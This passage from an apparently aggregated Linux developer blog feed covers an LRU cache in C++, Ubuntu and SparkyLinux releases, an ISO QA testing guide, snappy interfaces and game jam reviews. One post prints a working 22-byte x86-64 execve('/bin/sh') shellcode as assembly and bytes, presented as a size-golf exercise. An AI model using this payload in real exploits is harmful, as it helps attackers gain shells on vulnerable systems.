    	Map<KeyType, Statement*> stmts;
    	StatementFactory stmt_factory;
    }

    Then we will add to the private fields of the Statement class the members prev and next: We’ll make a circular doubly linked list.

    class Statement: QObject {
    	Q_OBJECT
        ...
    private:
    	Statement *next;
    	Statement *prev;
    };

    Next we initialize the LRU:

    StatementUser::StatementUser() 
    {
    	stmt_lru.max = 500;
    	stmt_lru.size = 0;		
    }

    Then we implement using the statements

    void StatementUser::useStatement(KeyType key)
    {
    	Statement *stmt;
    
    	if (!stmts.get (key, &stmt)) {
    
    		stmt = stmt_factory.createStatement(key);
    
    		stmts.insert (key, stmt);
    
    		/* So the ring looks a bit like this: *
    		 *                                    *
    		 *    .--tail  .--head                *
    		 *    |        |                      *
    		 *  [p-n] -> [p-n] -> [p-n] -> [p-n]  *
    		 *    ^                          |    *
    		 *    `- [n-p] <- [n-p] <--------'    */
    
    		if (stmt_lru.size >= stmt_lru.max) {
    			Statement *new_head;
    
    		/* We reached max-size of the LRU stmt cache. Destroy current
    		 * least recently used (stmt_lru.head) and fix the ring. For
    		 * that we take out the current head, and close the ring.
    		 * Then we assign head->next as new head. */
    
    			new_head = stmt_lru.head->next;
    			auto to_del = stmts.find (stmt_lru.head);
    			stmts.remove (to_del);
    			delete stmt_lru.head;
    			stmt_lru.size--;
    			stmt_lru.head = new_head;
    		} else {
    			if (stmt_lru.size == 0) {
    				stmt_lru.head = stmt;
    				stmt_lru.tail = stmt;
    			}
    		}
    
    	/* Set the current stmt (which is always new here) as the new tail
    	 * (new most recent used). We insert current stmt between head and
    	 * current tail, and we set tail to current stmt. */
    
    		stmt_lru.size++;
    		stmt->next = stmt_lru.head;
    		stmt_lru.head->prev = stmt;
    
    		stmt_lru.tail->next = stmt;
    		stmt->prev = stmt_lru.tail;
    		stmt_lru.tail = stmt;
    
    	} else {
    		if (stmt == stmt_lru.head) {
    
    		/* Current stmt is least recently used, shift head and tail
    		 * of the ring to efficiently make it most recently used. */
    
    			stmt_lru.head = stmt_lru.head->next;
    			stmt_lru.tail = stmt_lru.tail->next;
    		} else if (stmt != stmt_lru.tail) {
    
    		/* Current statement isn't most recently used, make it most
    		 * recently used now (less efficient way than above). */
    
    		/* Take stmt out of the list and close the ring */
    			stmt->prev->next = stmt->next;
    			stmt->next->prev = stmt->prev;
    
    		/* Put stmt as tail (most recent used) */
    			stmt->next = stmt_lru.head;
    			stmt_lru.head->prev = stmt;
    			stmt->prev = stmt_lru.tail;
    			stmt_lru.tail->next = stmt;
    			stmt_lru.tail = stmt;
    		}
    
    	/* if (stmt == tail), it's already the most recently used in the
    	 * ring, so in this case we do nothing of course */
    	}
    
    	/* Use stmt */
    
    	return;
    }

    In case StatementUser and Statement form a composition (StatementUser owns Statement, which is what makes most sense), don’t forget to delete the instances in the destructor of StatementUser. In the example’s case we used heap objects. You can loop the stmt_lru or the map here.

    StatementUser::~StatementUser()
    {
    	Map<KeyType, Statement*>::iterator i;
        	for (i = stmts.begin(); i != stmts.end(); ++i) {
    		delete i.value();
    	}
    }
    0 Add to favourites0 Bury

    29 April, 2016 09:30PM by Philip Van Hoof (pvanhoof@gnome.org)

    hackergotchi for Ubuntu developers

    Ubuntu developers

    Sam Hewitt: Extending the Ubuntu Icon Spec.

    So you have a new Ubuntu application, you've built it in QML with the Ubuntu SDK and now you're going to give your app a brand shiny new icon? But you go and visit the official documentation and you go "where do I start? How do I make an icon?" Well, you're kind of out of luck.

    When I started designing app icons for folks, I (too) felt the official specification was lacking detailed instructions and explanations for the Suru design –not to mention it's woefully out of date– which isn't much help. My only recourse was to follow updates to the official icons themselves and to dissect the icons to determine the elements and visual principles that make up the Suru style and updates to it.

    Now, that information or course of action may only be useful to someone like myself who does icon design and can see the cogs behind the images, so what is Jane or Joe app developer to do?

    Not to worry, some time ago I wrote a guide that is an extension of sorts to the official documentation, breaking down the Suru-style a bit and showing how you can make an icon your self as well as provide a few resources.

    Ubuntu Icon Design Guide

    So if you use & find my guide useful, feel free to contact me if you would like me critique your icon or give feedback. 😊

    29 April, 2016 08:30PM

    Ubuntu Insights: LTS 16.04 Review roundup!

    xerus_orange_300px_hex (1)

    What a month! We had the release of Ubuntu 16.04 LTS that allowed us to bring out newer software for desktop in the form of snap packaging formats and tools.

    By bringing snap packages to Ubuntu 16.04 LTS we are unifying the experience for Ubuntu developers, whether they are creating software for PC, Server, Mobile, and/or IoT Devices. This means greater security and reliability as it allows the two packaging formats – snap packages and traditional deb packages – to live comfortably next to one another which enables us to maintain our existing processes for development and updates to the OS. This reinforces our relationship with the Debian community and it enables developers and communities to publish either debs or snaps for the Ubuntu audience.

    To celebrate the release, we’ve collated a range of reviews that shed light on what the LTS means. Happy reading!

    Who said Ubuntu’s boring? From Infoworld >

    Great slideshow of all the key features from IDG on Network World >

    ‘Ubuntu 16.04 LTS gives fans new reasons to love this popular linux desktop’ via PC World

    And one of our favourite titles! ‘A perfect marriage between you and Ubuntu’ thanks The Register!

    29 April, 2016 01:00PM

    April 28, 2016

    hackergotchi for SparkyLinux

    SparkyLinux

    SparkyLinux 4.3 is out

    New, updated iso images of SparkyLinux 4.3 “Tyche” are available now.
    As before, Sparky “Home” editions provide fully featured operating system based on the Debian ‘testing’, with desktops of your choice: LXDE, LXQt, KDE, MATE and Xfce.

    Changes between version 4.2 and 4.3:
    – full system upgrade as of April 24, 2016
    – Linux kernel 4.5.1
    – Iceweasel web browser replaced by Firefox
    – Turpial microblogging client replaced by Corebird
    – APTus 0.3.x with an option of installation a set of pre-configured desktops: http://sparkylinux.org/aptus-0-3-0/
    – Ceni network manager changed by Network Manager in the CLI edition; the manual network configuration can be done via the ‘nmtui’ command
    – openjdk and icedtea-plugin updated to version 8.x
    – LibreOffice 5.1.2
    – gstreamer0.10 completely removed, the system uses only gstreamer1.0 now
    – Exaile audio player (based on gstreamer0.10) replaced by Audacious
    – Gnome-Screenshot changed by Gscreenshot
    – all the iso images are signed with the GPG key, check how to verify Sparky images:
    http://sparkylinux.org/wiki/doku.php/verify_iso

    “Base Openbox” and “CLI” editions changed their names to: MinimalGUI and MinimalCLI. They feature upgraded Sparky Advanced Installer, which lets you install the base system with a minimal set of applications and a desktop of your choice, such as:
    – awesome
    – bspwm
    – Budgie
    – Cinnamon
    – Enlightenment
    – Fluxbox
    – GNOME Flashback
    – GNOME Shell
    – i3
    – IceWM
    – JWM
    – KDE Plasma 5
    – LXDE
    – LXQt
    – MATE
    – Openbox
    – Pantheon
    – Window Maker
    – Xfce

    Find screenshots of all available Sparky desktops at:
    http://sparkylinux.org/4-3-minimaliso-screenshots/

    The installation of a desktop of your choice via the Advanced Installer is possible only if your network connection is on (online installation). Otherwise, the Advanced Installer installs the Live system as it is.

    * Make sure that the Sparky Advanced Installer lets you install a desktop of your choice using the MinimaGUI or MinimalCLI iso images only. Using the Advanced Installer in the Home editions will install the Live system as it is.

    ISO images of SparkyLinux can be downloaded from the download page:
    http://sparkylinux.org/download

    Known issues:
    * The Pantheon desktop needs to be chosen in the LightDM window instead of the default session at first login.

     

    28 April, 2016 10:37PM by pavroo

    hackergotchi for Ubuntu developers

    Ubuntu developers

    Costales: From uNav with ❤ to OpenStreetMap


    We (Joerg Berroth, Nekhelesh Ramananthan, Marcos Costales) donated all the money of this quarter from the uNav donate version to OpenStreetMap project.

    We love OSM!

    Donation

    We're happy that the 20% of the purchases are going to Ubuntu already :))

    28 April, 2016 08:57PM by Marcos Costales (noreply@blogger.com)

    The Fridge: Ubuntu Online Summit: 3-5 May

    The next Ubuntu Online Summit (UOS) is going to be from 3-5 May 2016 with sessions happening from 14:00 – 20:00 UTC.

    If you are planning to attend, please register here:

    http://summit.ubuntu.com/uos-1605/registration/

    If you and your team need to discuss something at UOS, please get your sessions in as soon as possible:

    http://summit.ubuntu.com/getinvolved/propose-a-session/

    Getting them in earlier will mean that others can plan their attendance accordingly and you will have better turnout. Please note that we are not only keen to have discussion and planning sessions, but also workshops and presentations.

    Originally posted to the community-announce mailing list on Wed Apr 27 08:06:53 UTC 2016 by Daniel Holbach

    28 April, 2016 03:53PM

    Ubuntu Podcast from the UK LoCo: S09E09 – Solitary Confinement - Ubuntu Podcast

    It’s Episode Nine of Season Nine of the Ubuntu Podcast! Alan Pope, Mark Johnson, Laura Cowen and Martin Wimpress are connected and speaking to your brain.

    We’re here again, although one of us is in Prague!

    In this week’s show:

    That’s all for this week! If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to show@ubuntupodcast.org or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

    28 April, 2016 02:00PM

    Canonical Design Team: Wallpaper design for Xenial Xerus 16.04

    April marks the release of Xerus 16.4 and with it we bring a new design of our iconic wallpaper. This post will take you through our design process and how we have integrated our Suru visual language.

    Evolution

    The foundation of our recent designs are based on our Suru visual language, which encompasses our core brand values, bringing consistency across the Ubuntu brand.

    Our Suru language is influenced by the minimalist nature of Japanese culture. We have taken elements of their Zen culture that give us a precise yet simplistic rhythm and used it in our designs. Working with paper metaphors we have drawn inspiration from the art of origami that provides us with a solid and tangible foundation to work from. Paper is also transferable, meaning it can be used in all areas of our brand in two and three dimensional forms.

    Design process

    We started by looking at previously released wallpapers across Ubuntu to see how each has evolved from each other. After seeing the previous designs we started to apply our new Suru patterns, which inspired us to move in a new direction.

    Ubuntu 14.10 ‘Utopic Unicorn’’

    wallpaper_unicorn

    Ubuntu 15.04 ‘Vivid Vervet’

    suru-desktop-wallpaper-ubuntu-vivid (1)

    Ubuntu 15.10 ‘Wily Werewolf’

    ubuntu-1510-wily-werewolf-wallpaper

    Step-by-step process

    Step 1. Origami animal

    Since every new Ubuntu release is named after animal, the Design Team wanted to bring this idea closer to the wallpaper and the Suru language. The folds are part of the origami animal and become the base of which we start our design process.

    Origarmi

    Step.2 Searching for the shape

    We started to look at different patterns by using various techniques with origami paper. We zoomed into particular folds of the paper, experimented with different light sources, photography, and used various effects to enhance the design.

    The idea was to bring actual origami to the wallpaper as much as possible. We had to think about composition that would work across all screen sizes, especially desktop. As the wallpaper is a prominent feature in a desktop environment, we wanted to make sure that it was user friendly, allowing users to find documents and folders located on the computer screen easily. The main priority was to not let the design get in the way of everyday usage, but enhance it aesthetically and provide a great user experience.

    After all the experiments with fold patterns and light sources, we started to look at colour. We wanted to integrate both the Ubuntu orange and Canonical aubergine to balance the brightness and played with gradient levels.

    We balanced the contrast of the wallpaper color palette by using a long and subtle gradient that kept the bright and feel look. This made the wallpaper became brighter and more colorful.

    Step.3 Final product

    The result was successful. The new concept and usage of Suru language helped to create a brighter wallpaper that fitted into our overall visual aesthetic. We created a three-dimensional look and feel that gives the feeling of actual origami appearance. The wallpaper is still recognizable as Ubuntu, but at the same time looks fresh and different.

    Ubuntu 16.04 Xenial Xerus

    Xerus - purple

    Ubuntu 16.04 Xenial Xerus ( light version)

    Xerus - Grey

    What is next?

    The Design Team is now looking at ways to bring the Suru language into animation and fold usage. The idea is to bring an overall seamless and consistent experience to the user, whilst reflecting our tone of voice and visual identity.

    28 April, 2016 01:39PM

    Simon Quigley: Contributing to Ubuntu - 2 - Ubuntu Quality

    For the past nine months, I have done a couple forms of QA for the Ubuntu project and flavors. In this blog post, I plan on highlighting some common practices and how I contributed.

    ISO QA Test

    Download the image

    For demonstration purposes, I'll grab the Lubuntu daily image, which as I'm writing this, is the Yakkety daily image. First, navigate to cdimage.ubuntu.com, it should look similar to the below screenshot:

    Since in this case we are testing Lubuntu, select lubuntu/, the page should look like this after loading:

    Lubuntu is a special case. They have desktop images and alternate images1. The desktop image is the same across all flavors, while the alternate image uses the Debian installer and requires less RAM to run. In this case, let's test the alternate image, so select daily/, the page should look like this after loading:

    In the above screenshot, I have noted a few things, here is the purpose of each directory2:
    20160425/ - I am writing this on April 26, 2016 (20160426), but this directory exists to ensure we have an image from the previous day for testing purposes and in the odd case that something gets messed up.
    20160426/ - These are today's images
    current/ - All of the images go through some automatic testing before proceeding to this directory, these are the last images that passed these tests.
    pending/ - This is the directory that holds the images that are either currently testing or that haven't passed the tests, and this is usually the same files as 20160426/.

    We are going to grab the image from the current/ directory. The page for current/ should look like the following screenshot3:

    Scroll down and you should see the following:

    Listed are three architectures: amd64 (which is 64-bit), i386 (which is 32-bit), and PowerPC (old Macintosh machines). Other Ubuntu flavors usually have only amd64 and i386, but Lubuntu has a PowerPC image as well. We have six (6) files for each architecture:

    1. *.OVERSIZED - irrelevant right now, you do not need to worry about it.
    2. *.iso - the image file.
    3. *.iso.zsync - the zsync file for the image.
    4. *.jigdo - the Jigdo file.
    5. *.list - the list file.
    6. *.template - the jigdo template file.

    I will show you how to utilize two (2) of the six (6) files in this directory to download the images. Ensure the zsync package is installed on your system before continuing. To download the image, yes, you can use your web browser to download the image. But there is a better way, using zsync. zsync allows you to download the image, but when the image changes, it will automatically merge the changes with the existing image that you have. Since it is the same directory and image name for the whole development cycle, you can safely use one link until the development release gets released. I'll create a directory to put the images:
    $ mkdir daily-images && cd daily-images
    Copy the zsync link for your architecture and paste it into the terminal, for example:
    $ zsync http://cdimage.ubuntu.com/lubuntu/daily-live/current/yakkety-desktop-amd64.iso.zsync
    When you press Enter, the image will download. When this is done, you should have the image ready to go.

    Getting set up with the ISO QA Tracker

    Navigate to iso.qa.ubuntu.com in your browser, you should see the following:

    On the left side, click the Log in button. You should be brought to a page that looks like this:

    If you already have an Ubuntu One account, log in with your credentials and press the Log In button. If you don't have an account, create one. I don't plan on going much into detail on this, so let's move on. You should be brought to a screen that looks similar to this:

    Click the Yes, log me in button. You should be brought to the following screen, if you have a black bar at the top like in the image, you have logged in correctly:

    Towards the bottom, you should see the Yakkety Daily suite3. Click on that and you should get to a screen with various options for images. Scroll down and you should get a screen similar to this:

    Since I downloaded the amd64 desktop image earlier, I will select Lubuntu Desktop amd64. You should get to a screen that looks like this:

    Here we have four test cases to choose from:

    • Install (auto-resize) - requires an existing installation.
    • Install (entire disk) - very generic.
    • Install (manual partitioning) - same as entire disk except you get to manually partition everything.
    • Live Session - testing the live instance.

    Because it's the most generic, I'll select Install (entire disk). When you click on that, you should get a screen similar to this:

    If you scroll down to the bottom, you should see something similar to this:

    Filling it out will be covered in a bit, but it's good to know what the submission form looks like.

    Executing the test case

    A lot of the test cases are done in virtual machines, but if you have hardware to spare, that's better, but it's not essential. I'm not going to cover how to use a virtual machines, but you can find good guides below. I prefer KVM because the Linux kernel has built-in support for it, it's a lot more integrated, and it's completely free software. I've used VirtualBox in the past, it's a great program, but it's proprietary, and the kernel modules can be a bit fidgety to get working after a kernel upgrade.

    Before you begin, read over the test case you plan on executing, there may be some important instructions that you need to watch out for. When you are ready to start, on the test case, select the In Progress radio box and press the Submit result button. Complete the test exactly how the test case says it should be done.

    During the installation, if you encounter an error that is critical enough that you cannot proceed, first look at the Bugs to look for. Is there a bug that describes your problem? If not, search Launchpad for the bug. If it's not there, identify the culprit package and file a bug against it. If you have trouble doing this, join the #ubuntu-quality channel using your IRC client or the IRC client provided below and ask for help.

    When you are done, on the test case page, click the button to edit your test case result:

    You should be brought to a page similar to this:

    If you had no trouble installing it using the instructions, select the Passed radio box. For the bugs, from what I have seen, any bugs in the system, NOT just the installation bugs, should be reported. So look at the release notes of the most recent milestone for the flavor you are testing, and go through bug reports. Confirm as much as you can, when you do, mark the bug as Me too and list the bugs under the Bugs header in the following format:

    XXXXX, YYYYY, ZZZZZ

    Be careful, the tracker likes to insert extra commas and sometimes mangle this a bit. Always check this field before updating your result.

    When you have all the bugs cited on this page, select the Update result button. If you then scroll down to the bottom, you should see your Launchpad ID with a green checkmark beside it and links to the bugs you listed. Congrats! You now completed that test case!

    Package QA Test

    The package QA tests exist to ensure that all packages are thoroughly tested for the release. Ensure you have an installation of the daily image for that flavor. Before you begin, ensure you have an Ubuntu One account set up. Also ensure you have read the previous section as I will not repeat some information that is explained above.

    Navigate to packages.qa.ubuntu.com in your browser, you should see the following:

    Click on Yakkety Daily3 and you should be brought to a screen similar to this:

    Since as of the time of writing, Xubuntu is the only flavor with package test cases, click on Xubuntu Desktop and you should be brought to a screen similar to this:

    At this point, open the test case and complete like normal, making sure to follow instructions exactly how they are listed. Instead of checking the release notes, go to the Launchpad bugs page for each package and check against all of the bugs. You can find the bugs for each package at the following URL, replacing PACKAGE with the respective package name:

    https://bugs.launchpad.net/ubuntu/+source/PACKAGE

    After this is done, congrats! You just completed a Package QA test!

    Write a manual test case

    The manual test cases are not automatically generated, they are hand-written for that application. I will tell you how to write a test case but I'm not actually going to write one because that would be too tedious for me to put in this article.

    To keep track of the manual test cases that need writing, we have bugs for each test case and details on what to do to it. I've done this a few times before, so I know these already, but read over the instructions for writing a test case before you begin. First, assign the bug to yourself and mark it as In Progress. Then read over the bug report and responses to ensure you know what you are doing. Next, ensure the program is installed by default in the flavor the bug report specifies. If this is not the case, mark the bug as Incomplete and state that it is not in the flavor you specified. If it is there, you can continue.

    After that, grab the source for the Ubuntu Manual Test Cases. Ensure you have bzr installed and run:

    $ bzr branch lp:ubuntu-manual-tests

    Then cd into the ubuntu-manual-tests directory just created. Go into the testcases/packages/ directory and another subdirectory if applicable. Open your favorite text editor and create a file with the name of the package you are creating a test case for, no need for any numbers. Using the guide above, write the test case and verify it. Below I have embedded a video by Nicholas Skaggs if you prefer to view a video:

    When you are done, make sure you are directly in the ubuntu-manual-tests directory, and execute the following command4:

    $ bzr add * && bzr commit --fixes lp:BUG#

    Then push to a Bazaar branch in Launchpad:

    $ bzr push lp:~/ubuntu-manual-tests/bugfix#####

    Then go to the Bazaar page for the Ubuntu Manual Testcases project and find your branch. Then submit a merge request detailing your test case. Congrats! You wrote a manual test case!

    Further questions?

    Below if you are on my website, I have linked an IRC client for you to use if you do not have your own. Type in a nickname, press start, and press Enter to speak in the channel. If you have an IRC client, go to #ubuntu-quality on irc.freenode.net. If you prefer not to use IRC, we have a mailing list that you can use if you wish. Good luck and I hope to see you around! ☺

    1. We also have a preinstalled image, but I will not cover that in this tutorial.
    2. Even though the directory names will have changed, the information is still accurate.
    3. This information will still be valid after we move on from Yakkety images.
    4. Make sure Bazaar is set up properly before doing this
    If you have questions/comments/concerns/suggestions about this article, my email is tsimonq2@ubuntu.com or I am tsimonq2 on Freenode (PMs and pings welcome).

    28 April, 2016 03:45AM by Simon Quigley (tsimonq2@ubuntu.com)

    April 27, 2016

    Costales: sudo apt-get install ubuntuphone unav libertad

    Virio, guerrero astur y actual líder del clan miraba desafiante su castro desde el texu.
    Bajo sus pies, la tierra empañada de sangre tras la última batalla, le recordaba que la avaricia romana volvería a asolarles con guerras interminables.

    Adaptación del guerrero astur de Berto Peña

    Pero no miraba el castro. Su corazón latía exuberante y su mente iba mas allá. Juró al Nuberu apreciar la libertad por el resto de sus días. Tras la victoria seguían siendo libres del yugo romano.

    En la distancia, los sones de gaitas y tambores resonaban por las angostas calles y plazas del castro. El jolgorio desatado de la victoria. El momento de festejar su libertad.


    Ahora, es tu turno ;)
    # apt-get install ubuntuphone unav libertad

    27 April, 2016 07:19PM by Marcos Costales (noreply@blogger.com)

    Nekhelesh Ramananthan: uNav 0.59 "Beauty and the Beast" is OUT!

    uNav 0.59

    The uNav team is proud to announce the release of uNav 0.59 code named Beauty and the Beast. In my opinion, this is truly one of the best releases we have pushed out. The code name should give you a hint of what we focused on for 0.59 ʘ‿ʘ

    User Testing

    We started doing user testing early in the development cycle with friends and colleagues which revealed several interesting issues that new users found to be confusing and detrimental to the uNav experience. I suppose the first step in solving a problem is acknowledging we have a problem. Internally we found it difficult to accept the fact that certain features like the NearBy, Menu Navigation and Search that we spent hours building was not as intuitive as we thought it would be.

    I am thankful to the volunteers who joined our user testing sessions which resulted in a brand new navigation structure described in the next section.

    Brand new navigation structure

    User testing revealed that our menu (route page) was inefficient and misleading. While it did present a nice launch pad from which users can perform actions, it took longer to perform basic actions like search and navigate.

    So we took a step back and looked at the bigger picture and asked ourselves,

    What is uNav? What do users really use uNav for?

    The answer is simple, uNav is a navigation app which helps users to get from Point A to Point B. It is critical that we make this feature the highlight of our app and easy to use.

    That meant bringing the ability to search for locations to the forefront of the app rather than burying it inside menus.

    uNav 0.59

    The search page provides quick access to various search sources (Address, Coordinates & Favorites).

    uNav 0.59

    Visual Revamp

    As you may have guessed from our code name, we have a beast of an app uNav..this release we focused on turning that beast into a princess ;). We injected some brand color into the app to make it more lively.

    The interface also guides the user and prevents them from making a mistake. I have talked about this in my past posts about the best interface being one which actively prevents the user from making a mistake rather than just showing a error dialog after they make a mistake.

    Here is a small example of it in action,

    uNav 0.59

    The zoom buttons got a bit of design love to improve their contrast against the map background.

    uNav 0.59

    POI Details

    This is my personal favorite feature in this release. It shows all available information about a POI. This feature is heavily dependent on the OpenStreeMap database. However, I have found that adding details about a POI (restaurant, shop etc) is super easy using OSM's web editor. By taking a few moments to fill them out, you help out the community as well.

    uNav 0.59

    Reverse Geocode

    You can long-press on any point in the map to get its address. If that point turns out to be a POI, then we show you its details.

    uNav 0.59

    Performance Improvements

    There are some massive improvements to the calculate route time with speed camera alerts features enabled. In our tests, a 500 Km road-trip would take 2-3 minutes before uNav displays the route and the speed camera. Now it only takes 2-3 seconds!

    Pinch Zoom

    Did you just read pinch-zoom? Yes you did! uNav 0.59 finally brings pinch-zoom feature and also an improved long-press feature.

    Well that's all from me. Hopefully I didn't bore you with my long blog post. Loving uNav? Be sure to let us know with your reviews in the app store.

    Next up, Chameleonic uNav!

    27 April, 2016 06:26PM

    Dustin Kirkland: Canonical and IBM Webinar -- Ubuntu on POWER and LinuxOne

    I'm delighted to share the slides from our joint IBM and Canonical webinar about Ubuntu on IBM POWER8 and LinuxOne servers.  You can download the PDF here, or tab through the slides embedded below.  The audio/video recording should be available tomorrow.



    Cheers,
    :-Dustin

    27 April, 2016 06:07PM by Dustin Kirkland (noreply@blogger.com)

    Zygmunt Krynicki: Anatomy of a snappy interface

    This post is the third in a series about snappy interfaces. Knowledge presented in posts one and two is assumed.

    Today we will look at what makes an interface. This post might be a bit heavier on the programming side so feel free to skip over the code fragments if that is not your thing. Note that we will not build an actual interface just yet. The goal of this article is to set the stage for that to be meaningful, at least in part.

    The Interface interface

    From the point of view of snappy, an Interface is a bit of code with specific APIs. In go's terms it is an interface (note the lower case i). If you are familiar with other languages it is just a way to describe a class with a specific set of methods.

    In go, this is spelled out as:

    type Interface interface {
    ...
    }


    This can be read as "the go type Interface is an object with the following methods ..."

    Interface name

    At a very basic level each interface has a name.

    type Interface interface {
    Name() string
    ...
    }

    That is, having an arbitrary interface you call the Name method to obtain the name of that interface. Interface name must be unique and is something that other developers will refer to so plan ahead and pick a good, descriptive name. You cannot just change it later.

    Validating plugs and slots

    Two of the methods in an Interface are used to verify if a plug or slot definition is correct.

    type Interface interface {
    ...
    SanitizePlug(plug *Plug) error
    SanitizeSlot(slot *Slot) error
    ...
     
    Remember that plugs and slots can hold arbitrary attributes. A particular interface, say, one that allows access to a GPIO pin, can use an attribute to describe which particular pin is exposed. As an interface author you should check if the pin is specified correctly (e.g. that it is a number, that it has a sensible value, etc).

    Both methods take an object to sanitize (a plug or a slot) and return an error if the object is incorrect. If you don't need to check anything just return nil and carry on.

    Interfaces and snippets

    Having a valid plug and slot, the main thing that interfaces do is to influence the various security systems. This is implemented as a set of four methods. Before I will spill the beans on the code I will explain this informally.

    Small digression, when you see a security system below think of things like apparmor and seccomp. I will focus on security systems in a dedicated instalment. For now they are simply a part of the overall security story. 

    Each security system is responsible for setting up security for each app of each snap. By default all apps get the same treatment, there is nothing unique about any particular app. Interfaces allow to pass extra information to a particular security system to let a particular app do more than it could otherwise.

    This extra information is exchanged as snippets. Snippets are just bits of untyped data, blobs, sequences of bytes. In practice all current snippets are just pieces of text that are easy to read and understand.

    Interfaces can hand out snippets for each of the four distinct cases:
    1. the mere fact of having a plug of a given interface
    2. the fact of having a particular plug connected to a particular slot
    3. the mere fact of having a slot of a given interface
    4. the fact of having a particular slot connected to a particular plug
    Note that there is a pattern. Applications can get extra permission by simply having a specific plug or a specific slot. Applications can also get extra permission by making an interface connection between a plug and a slot.

    Typically most permissions will be based around a plug connected to a slot. Apps bound to the plug will be allowed to talk to a specific socket, to a specific DBus object, to a specific device on the system. All such permissions will be expressed through a snippet provided by case 2 in the list above.

    For applications providing services to other snaps (e.g. bluez, network-manager, pulseaudio, mir, X11) the mere fact of having a slot will grant permissions to create the service (to configure network, manage GPUs, etc). Applications like this will use the mechanism provided by case 3 in the list above.

    The meaning of the snippets is almost opaque to snappy. Snappy collects them, assembles them together and hands them over to security backends to process. At the end of the day they end up as various configuration files.

    So how does the method definition look like? Like this:

    type Interface interface {
    ...
    PermanentPlugSnippet(plug *Plug, securitySystem SecuritySystem) ([]byte, error)
    ConnectedPlugSnippet(plug *Plug, slot *Slot, securitySystem SecuritySystem) ([]byte, error)
    PermanentSlotSnippet(slot *Slot, securitySystem SecuritySystem) ([]byte, error)
    ConnectedSlotSnippet(plug *Plug, slot *Slot, securitySystem SecuritySystem) ([]byte, error)
    ...
    }

    Note that each method gets the name of the security system as an argument. A single interface can influence all security systems if that is required for it to operate correctly.

    Connecting interfaces automatically

    The one last thing an interface can do is say it wants to automatically connect plugs to viable slots under certain conditions. This is expressed as the following method:

    type Interface interface {
    ...
    AutoConnect() bool
    }

    This feature was designed to let snappy automatically connect plugs in snaps being installed if there is a viable, unique slot on the OS snap that satisfies the interface requirements. If you recall, the OS snap exposes a number of slots for things like network, network-bind and so on. To make the user experience better, when a snap wants to use one of those interfaces the user does not have to connect them explicitly.

    Please note that we're going to be conservative in what can be connected automatically. As a rule of thumb auto-connection is allowed if this is a reasonable thing to do and it is not a serious security risk (the interface doesn't hand out too much power).

    The complete picture

    You can check the complete interface code, with documentation, here. The key thing to take out of this whole article is that interfaces are bits of code that can validate plugs and slots and hand out security snippets.

    How this actually gets used and how the snippets should look like, that is for the next post.

    27 April, 2016 12:50PM by Zygmunt Krynicki (noreply@blogger.com)

    hackergotchi for Maemo developers

    Maemo developers

    Secretly reusing my own LRU code

    Last week, I secretly reused my own LRU code in the model of the editor of a CNC machine (has truly huge files, needs a statement editor). I rewrote my own code, of course. It’s Qt based, not GLib. Wouldn’t work in original form anyway. But the same principle. Don’t tell Jürg who helped me write that, back then.

    Extra points and free beer for people who can find it in Tracker’s code.

    0 Add to favourites0 Bury

    27 April, 2016 10:55AM by Philip Van Hoof (pvanhoof@gnome.org)

    hackergotchi for Ubuntu developers

    Ubuntu developers

    David Tomaschik: Even shorter x86-64 shellcode

    So about two years ago, I put together the shortest x86-64 shellcode for execve("/bin/sh",...); that I could. At the time, it was 25 bytes, which I thought was pretty damn good. However, I’m a perfectionist and so I spent some time before work this morning playing shellcode golf. The rules of my shellcode golf are pretty simple:

    • The shellcode must produce the desired effect.
    • It doesn’t have to do things cleanly (i.e., segfaulting after is OK, as is using APIs in unusual ways, so long as it works)
    • It can assume the stack pointer is at a place where it will not segfault and it will not overwrite the shellcode itself.
    • No NULLs. While there might be other constraints, this one is too common to not have as a default.

    So, spending a little bit of time on this, I came up with the following 22 byte shellcode:

    BITS 64
    
    xor esi, esi
    push rsi
    mov rbx, 0x68732f2f6e69622f
    push rbx
    push rsp
    pop rdi
    imul esi
    mov al, 0x3b
    syscall
    

    Assembled, we get:

    char shellcode[] = "\x31\xF6\x56\x48\xBB\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x53\x54\x5F\xF7\xEE\xB0\x3B\x0F\x05";
    

    This is shorter than anything I could find on shell-storm or other shellcode repositories. If you know of something shorter or think you can do better, let me know!

    27 April, 2016 07:00AM

    April 26, 2016

    Stuart Langridge: LOWREZJAM reviews

    A few weeks ago, the LOWREZJAM kicked off on itch.io. It’s a game jam; the idea is to build a computer game. This one had an interesting restriction: the game had to be 64x64 pixels. So, we’re going old-school.

    I thought I’d enter. So did about four hundred other people. It turns out that a jolly good way to get people to rate your game is for you to rate theirs and comment on it; then, your comment gets decorated with a link saying “see their submission” and they tend to follow it and rate you in turn. So, I wrote a bunch of short reviews. There doesn’t seem to be a way to link to all my reviews in a given jam on itch.io (although it would be good if there were!), so I’ve collected them here for posterity. Note that these make no attempt to be comprehensive or fair or balanced; they’re basically comments on what I thought of the games I played and why I didn’t like them, if indeed I didn’t.

    A few games got a rating but not a comment; those aren’t included. I also haven’t included the actual ratings I gave, because those don’t matter as much. The comments are mainly designed to be helpful to the game’s developer, if anything.

    I only played in-browser games, because they’re easiest to play, and I don’t have the Unity web player so those games which require it didn’t get played. It’s good to see that a pretty high proportion of “Unity” games are using the Unity WebGL export so they can be played without the plugin! I also didn’t play everything; with 188 games just in-browser, I was never going to get through them all. Pro-tip: this is one good reason to give your game nice imagery, so it looks interesting in a big list.

    In essence, this was a lot of fun. There were an awful lot of things which were clearly only part-finished (didn’t have sound, didn’t have a way to win, didn’t have title screens, and so on), but there were some really accomplished entries in here; things that I can absolutely imagine being a released game that one could play and have fun with. Nice work, indie game dev community.

    You can also watch Jupiter Hadley play all the games on her YouTube channel; at time of writing mine isn’t done yet, but it should be over the next few days.

    So! Reviews!


    MatchMerchant

    The extra challenge provided by trying to match 4 (to get a potion) while not matching 3 (so the things disappear) adds an interesting extra wrinkle to this. The scene — a potion seller, wizards — adds some meaning to the game mechanic, and the graphics are good. Dragging is a little awkward, and unlike most match-3 games you can drag to swap any two pieces, which I didn’t at first realise.


    Time Scale

    I appreciate the idea of slowing down time. But I’m not sure why I wouldn’t play just with my finger on the shift key the whole entire time, thus turning the game into Bullet Time All The Time? Some puzzles which require performing them with time at normal speed would be nice, although maybe there are plenty and I just didn’t get that far….

    (also, the sound made by the “fire dots into the air” triangles is not perfectly synchronised with actually firing dots into the air, which makes jumping over them considerably harder; this may have been a deliberate thing, but it’s over the line between “maliciously confusing” and “just annoying”, for me at least)


